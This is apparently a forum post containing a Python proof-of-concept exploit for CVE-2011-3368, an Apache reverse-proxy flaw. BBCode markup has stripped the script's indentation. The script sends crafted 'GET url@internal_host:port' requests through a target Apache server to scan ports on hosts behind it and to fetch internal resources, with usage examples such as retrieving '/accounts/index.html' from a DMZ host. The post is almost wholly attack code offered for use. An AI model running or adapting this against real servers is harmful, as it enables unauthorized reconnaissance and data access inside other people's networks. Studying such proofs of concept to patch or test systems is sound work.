Kod:
[COLOR=#008200]#!/usr/bin/env python [/COLOR]
[B][COLOR=#006699]import[/COLOR][/B] socket
[B][COLOR=#006699]import[/COLOR][/B] string
[B][COLOR=#006699]import[/COLOR][/B] getopt, sys
known_ports [B][COLOR=#006699]=[/COLOR][/B] [[COLOR=#009900]0[/COLOR],[COLOR=#009900]21[/COLOR],[COLOR=#009900]22[/COLOR],[COLOR=#009900]23[/COLOR],[COLOR=#009900]25[/COLOR],[COLOR=#009900]53[/COLOR],[COLOR=#009900]69[/COLOR],[COLOR=#009900]80[/COLOR],[COLOR=#009900]110[/COLOR],[COLOR=#009900]137[/COLOR],[COLOR=#009900]139[/COLOR],[COLOR=#009900]443[/COLOR],[COLOR=#009900]445[/COLOR],[COLOR=#009900]3306[/COLOR],[COLOR=#009900]3389[/COLOR],[COLOR=#009900]5432[/COLOR],[COLOR=#009900]5900[/COLOR],[COLOR=#009900]8080[/COLOR]]
[B][COLOR=#006699]def[/COLOR][/B] send_request(url, apache_target, apache_port, internal_target, internal_port, resource):
get [B][COLOR=#006699]=[/COLOR][/B] [COLOR=#0000ff]"GET "[/COLOR] [B][COLOR=#006699]+[/COLOR][/B] url [B][COLOR=#006699]+[/COLOR][/B] [COLOR=#0000ff]"@"[/COLOR] [B][COLOR=#006699]+[/COLOR][/B] internal_target [B][COLOR=#006699]+[/COLOR][/B] [COLOR=#0000ff]":"[/COLOR] [B][COLOR=#006699]+[/COLOR][/B] internal_port [B][COLOR=#006699]+[/COLOR][/B] [COLOR=#0000ff]"/"[/COLOR] [B][COLOR=#006699]+[/COLOR][/B] resource [B][COLOR=#006699]+[/COLOR][/B] [COLOR=#0000ff]" HTTP/1.1\r\n"[/COLOR]
get [B][COLOR=#006699]=[/COLOR][/B] get [B][COLOR=#006699]+[/COLOR][/B] [COLOR=#0000ff]"Host: "[/COLOR] [B][COLOR=#006699]+[/COLOR][/B] apache_target [B][COLOR=#006699]+[/COLOR][/B] [COLOR=#0000ff]"\r\n\r\n"[/COLOR]
remoteserver [B][COLOR=#006699]=[/COLOR][/B] socket.socket(socket.AF_INET, socket.SOCK_STREAM)
remoteserver.settimeout([COLOR=#009900]3[/COLOR])
[B][COLOR=#006699]try[/COLOR][/B]:
remoteserver.connect((apache_target, [COLOR=#ff1493]int[/COLOR](apache_port)))
remoteserver.send(get)
[B][COLOR=#006699]return[/COLOR][/B] remoteserver.recv([COLOR=#009900]4096[/COLOR])
[B][COLOR=#006699]except[/COLOR][/B]:
[B][COLOR=#006699]return[/COLOR][/B] ""
[B][COLOR=#006699]def[/COLOR][/B] get_banner(result):
[B][COLOR=#006699]return[/COLOR][/B] result[string.find(result, [COLOR=#0000ff]"\r\n\r\n"[/COLOR])[B][COLOR=#006699]+[/COLOR][/B][COLOR=#009900]4[/COLOR]:]
[B][COLOR=#006699]def[/COLOR][/B] scan_host(url, apache_target, apache_port, internal_target, tested_ports, resource):
print_banner(url, apache_target, apache_port, internal_target, tested_ports, resource)
[B][COLOR=#006699]for[/COLOR][/B] port [B][COLOR=#006699]in[/COLOR][/B] tested_ports:
port [B][COLOR=#006699]=[/COLOR][/B] [COLOR=#ff1493]str[/COLOR](port)
result [B][COLOR=#006699]=[/COLOR][/B] send_request(url, apache_target, apache_port, internal_target, port, resource)
[B][COLOR=#006699]if[/COLOR][/B] string.find(result,[COLOR=#0000ff]"HTTP/1.1 200"[/COLOR])![B][COLOR=#006699]=-[/COLOR][/B][COLOR=#009900]1[/COLOR] [B][COLOR=#006699]or[/COLOR][/B] \
string.find(result,[COLOR=#0000ff]"HTTP/1.1 30"[/COLOR])![B][COLOR=#006699]=-[/COLOR][/B][COLOR=#009900]1[/COLOR] [B][COLOR=#006699]or[/COLOR][/B] \
string.find(result,[COLOR=#0000ff]"HTTP/1.1 502"[/COLOR])![B][COLOR=#006699]=-[/COLOR][/B][COLOR=#009900]1[/COLOR]:
[COLOR=#ff1493]print[/COLOR] [COLOR=#0000ff]"- Open port: "[/COLOR] [B][COLOR=#006699]+[/COLOR][/B] port [B][COLOR=#006699]+[/COLOR][/B] [COLOR=#0000ff]"/TCP"[/COLOR]
[COLOR=#ff1493]print[/COLOR] get_banner(result)
[B][COLOR=#006699]elif[/COLOR][/B] [COLOR=#ff1493]len[/COLOR](result)[B][COLOR=#006699]==[/COLOR][/B][COLOR=#009900]0[/COLOR]:
[COLOR=#ff1493]print[/COLOR] [COLOR=#0000ff]"- Filtered port: "[/COLOR] [B][COLOR=#006699]+[/COLOR][/B] port [B][COLOR=#006699]+[/COLOR][/B] [COLOR=#0000ff]"/TCP"[/COLOR]
[B][COLOR=#006699]else[/COLOR][/B]:
[COLOR=#ff1493]print[/COLOR] [COLOR=#0000ff]"- Closed port: "[/COLOR] [B][COLOR=#006699]+[/COLOR][/B] port [B][COLOR=#006699]+[/COLOR][/B] [COLOR=#0000ff]"/TCP"[/COLOR]
[B][COLOR=#006699]def[/COLOR][/B] usage():
[COLOR=#ff1493]print[/COLOR]
[COLOR=#ff1493]print[/COLOR] [COLOR=#0000ff]"CVE-2011-3368 proof of concept by Rodrigo Marcos"[/COLOR]
[COLOR=#ff1493]print[/COLOR] [COLOR=#0000ff]"http://www.secforce.co.uk"[/COLOR]
[COLOR=#ff1493]print[/COLOR]
[COLOR=#ff1493]print[/COLOR] [COLOR=#0000ff]"usage():"[/COLOR]
[COLOR=#ff1493]print[/COLOR] [COLOR=#0000ff]"python apache_scan.py [options]"[/COLOR]
[COLOR=#ff1493]print[/COLOR]
[COLOR=#ff1493]print[/COLOR] [COLOR=#0000ff]" [options]"[/COLOR]
[COLOR=#ff1493]print[/COLOR] [COLOR=#0000ff]" -r: Remote Apache host"[/COLOR]
[COLOR=#ff1493]print[/COLOR] [COLOR=#0000ff]" -p: Remote Apache port (default is 80)"[/COLOR]
[COLOR=#ff1493]print[/COLOR] [COLOR=#0000ff]" -u: URL on the remote web server (default is /)"[/COLOR]
[COLOR=#ff1493]print[/COLOR] [COLOR=#0000ff]" -d: Host in the DMZ (default is 127.0.0.1)"[/COLOR]
[COLOR=#ff1493]print[/COLOR] [COLOR=#0000ff]" -e: Port in the DMZ (enables 'single port scan')"[/COLOR]
[COLOR=#ff1493]print[/COLOR] [COLOR=#0000ff]" -g: GET request to the host in the DMZ (default is /)"[/COLOR]
[COLOR=#ff1493]print[/COLOR] [COLOR=#0000ff]" -h: Help page"[/COLOR]
[COLOR=#ff1493]print[/COLOR]
[COLOR=#ff1493]print[/COLOR] [COLOR=#0000ff]"examples:"[/COLOR]
[COLOR=#ff1493]print[/COLOR] [COLOR=#0000ff]" - Port scan of the remote host"[/COLOR]
[COLOR=#ff1493]print[/COLOR] [COLOR=#0000ff]" python apache_scan.py -r www.example.com -u /images/test.gif"[/COLOR]
[COLOR=#ff1493]print[/COLOR] [COLOR=#0000ff]" - Port scan of a host in the DMZ"[/COLOR]
[COLOR=#ff1493]print[/COLOR] [COLOR=#0000ff]" python apache_scan.py -r www.example.com -u /images/test.gif -d internalhost.local"[/COLOR]
[COLOR=#ff1493]print[/COLOR] [COLOR=#0000ff]" - Retrieve a resource from a host in the DMZ"[/COLOR]
[COLOR=#ff1493]print[/COLOR] [COLOR=#0000ff]" python apache_scan.py -r www.example.com -u /images/test.gif -d internalhost.local -e 80 -g /accounts/index.html"[/COLOR]
[COLOR=#ff1493]print[/COLOR]
[B][COLOR=#006699]def[/COLOR][/B] print_banner(url, apache_target, apache_port, internal_target, tested_ports, resource):
[COLOR=#ff1493]print[/COLOR]
[COLOR=#ff1493]print[/COLOR] [COLOR=#0000ff]"CVE-2011-3368 proof of concept by Rodrigo Marcos"[/COLOR]
[COLOR=#ff1493]print[/COLOR] [COLOR=#0000ff]"http://www.secforce.co.uk"[/COLOR]
[COLOR=#ff1493]print[/COLOR]
[COLOR=#ff1493]print[/COLOR] [COLOR=#0000ff]" [+] Target: "[/COLOR] [B][COLOR=#006699]+[/COLOR][/B] apache_target
[COLOR=#ff1493]print[/COLOR] [COLOR=#0000ff]" [+] Target port: "[/COLOR] [B][COLOR=#006699]+[/COLOR][/B] apache_port
[COLOR=#ff1493]print[/COLOR] [COLOR=#0000ff]" [+] Internal host: "[/COLOR] [B][COLOR=#006699]+[/COLOR][/B] internal_target
[COLOR=#ff1493]print[/COLOR] [COLOR=#0000ff]" [+] Tested ports: "[/COLOR] [B][COLOR=#006699]+[/COLOR][/B] [COLOR=#ff1493]str[/COLOR](tested_ports)
[COLOR=#ff1493]print[/COLOR] [COLOR=#0000ff]" [+] Internal resource: "[/COLOR] [B][COLOR=#006699]+[/COLOR][/B] resource
[COLOR=#ff1493]print[/COLOR]
[B][COLOR=#006699]def[/COLOR][/B] main():
[B][COLOR=#006699]global[/COLOR][/B] apache_target
[B][COLOR=#006699]global[/COLOR][/B] apache_port
[B][COLOR=#006699]global[/COLOR][/B] url
[B][COLOR=#006699]global[/COLOR][/B] internal_target
[B][COLOR=#006699]global[/COLOR][/B] internal_port
[B][COLOR=#006699]global[/COLOR][/B] resource
[B][COLOR=#006699]try[/COLOR][/B]:
opts, args [B][COLOR=#006699]=[/COLOR][/B] getopt.getopt(sys.argv[[COLOR=#009900]1[/COLOR]:], [COLOR=#0000ff]"u:r:p:d:e:g:h"[/COLOR], [[COLOR=#0000ff]"help"[/COLOR]])
[B][COLOR=#006699]except[/COLOR][/B] getopt.GetoptError:
usage()
sys.exit([COLOR=#009900]2[/COLOR])
[B][COLOR=#006699]try[/COLOR][/B]:
[B][COLOR=#006699]for[/COLOR][/B] o, a [B][COLOR=#006699]in[/COLOR][/B] opts:
[B][COLOR=#006699]if[/COLOR][/B] o [B][COLOR=#006699]in[/COLOR][/B] ([COLOR=#0000ff]"-h"[/COLOR], [COLOR=#0000ff]"--help"[/COLOR]):
usage()
sys.exit([COLOR=#009900]2[/COLOR])
[B][COLOR=#006699]if[/COLOR][/B] o [B][COLOR=#006699]==[/COLOR][/B] [COLOR=#0000ff]"-u"[/COLOR]:
url[B][COLOR=#006699]=[/COLOR][/B]a
[B][COLOR=#006699]if[/COLOR][/B] o [B][COLOR=#006699]==[/COLOR][/B] [COLOR=#0000ff]"-r"[/COLOR]:
apache_target[B][COLOR=#006699]=[/COLOR][/B]a
[B][COLOR=#006699]if[/COLOR][/B] o [B][COLOR=#006699]==[/COLOR][/B] [COLOR=#0000ff]"-p"[/COLOR]:
apache_port[B][COLOR=#006699]=[/COLOR][/B]a
[B][COLOR=#006699]if[/COLOR][/B] o [B][COLOR=#006699]==[/COLOR][/B] [COLOR=#0000ff]"-d"[/COLOR]:
internal_target [B][COLOR=#006699]=[/COLOR][/B] a
[B][COLOR=#006699]if[/COLOR][/B] o [B][COLOR=#006699]==[/COLOR][/B] [COLOR=#0000ff]"-e"[/COLOR]:
internal_port[B][COLOR=#006699]=[/COLOR][/B]a
[B][COLOR=#006699]if[/COLOR][/B] o [B][COLOR=#006699]==[/COLOR][/B] [COLOR=#0000ff]"-g"[/COLOR]:
resource[B][COLOR=#006699]=[/COLOR][/B]a
[B][COLOR=#006699]except[/COLOR][/B] getopt.GetoptError:
usage()
sys.exit([COLOR=#009900]2[/COLOR])
[B][COLOR=#006699]if[/COLOR][/B] apache_target [B][COLOR=#006699]==[/COLOR][/B] "":
usage()
sys.exit([COLOR=#009900]2[/COLOR])
url [B][COLOR=#006699]=[/COLOR][/B] [COLOR=#0000ff]"/"[/COLOR]
apache_target [B][COLOR=#006699]=[/COLOR][/B] ""
apache_port [B][COLOR=#006699]=[/COLOR][/B] [COLOR=#0000ff]"80"[/COLOR]
internal_target [B][COLOR=#006699]=[/COLOR][/B] [COLOR=#0000ff]"127.0.0.1"[/COLOR]
internal_port [B][COLOR=#006699]=[/COLOR][/B] ""
resource [B][COLOR=#006699]=[/COLOR][/B] [COLOR=#0000ff]"/"[/COLOR]
main()
[B][COLOR=#006699]if[/COLOR][/B] internal_port![B][COLOR=#006699]=[/COLOR][/B]"":
tested_ports [B][COLOR=#006699]=[/COLOR][/B] [internal_port]
[B][COLOR=#006699]else[/COLOR][/B]:
tested_ports [B][COLOR=#006699]=[/COLOR][/B] known_ports
scan_host(url, apache_target, apache_port, internal_target, tested_ports, resource)
